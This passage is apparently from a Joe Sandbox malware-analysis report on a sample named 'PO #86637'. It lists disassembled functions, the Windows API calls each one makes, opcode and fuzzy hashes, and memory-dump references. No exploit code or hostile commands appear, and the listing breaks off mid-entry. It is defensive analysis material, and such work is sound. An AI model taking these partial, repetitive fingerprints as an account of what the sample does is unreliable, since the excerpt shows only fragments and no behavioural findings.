                      • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                      Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$Window
                      • String ID: SysMonthCal32
                      • API String ID: 2326795674-1439706946
                      • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                      • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                      • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                      • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                      Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32(00000000), ref: 00450A2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: DestroyWindow
                      • String ID: msctls_updown32
                      • API String ID: 3375834691-2298589950
                      • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                      • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                      • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                      • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                      Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: $<
                      • API String ID: 4104443479-428540627
                      • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                      • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                      • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                      • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                      Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID: \VH
                      • API String ID: 1682464887-234962358
                      • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                      • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                      • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                      • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                      Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID: \VH
                      • API String ID: 1682464887-234962358
                      • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                      • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                      • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                      • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                      Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID: \VH
                      • API String ID: 1682464887-234962358
                      • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                      • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                      • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                      • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                      Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume
                      • String ID: \VH
                      • API String ID: 2507767853-234962358
                      • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                      • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                      • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                      • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                      Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume
                      • String ID: \VH
                      • API String ID: 2507767853-234962358
                      • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                      • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                      • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                      • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                      Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: msctls_trackbar32
                      • API String ID: 3850602802-1010561917
                      • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                      • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                      • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                      • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                      Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                      • String ID: crts
                      • API String ID: 943502515-3724388283
                      • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                      • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                      • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                      • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                      Function 0046E48C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64comCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                      • CoInitialize.OLE32(00000000), ref: 0046E505
                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                      • CoUninitialize.OLE32 ref: 0046E53D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                      • String ID: .lnk
                      • API String ID: 886957087-24824748
                      • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                      • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                      • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                      • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                      Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                      • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                      • SetErrorMode.KERNEL32(?), ref: 0045D35C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$LabelVolume
                      • String ID: \VH
                      • API String ID: 2006950084-234962358
                      • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                      • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                      • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                      • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                      Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • GetMenuItemInfoW.USER32 ref: 00449727
                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                      • DrawMenuBar.USER32 ref: 00449761
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$InfoItem$Draw_malloc
                      • String ID: 0
                      • API String ID: 772068139-4108050209
                      • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                      • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                      • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                      • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                      Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcslen$_wcscpy
                      • String ID: 3, 3, 8, 1
                      • API String ID: 3469035223-357260408
                      • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                      • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                      • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                      • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                      Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: ICMP.DLL$IcmpCloseHandle
                      • API String ID: 2574300362-3530519716
                      • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                      • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                      • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                      • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                      Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
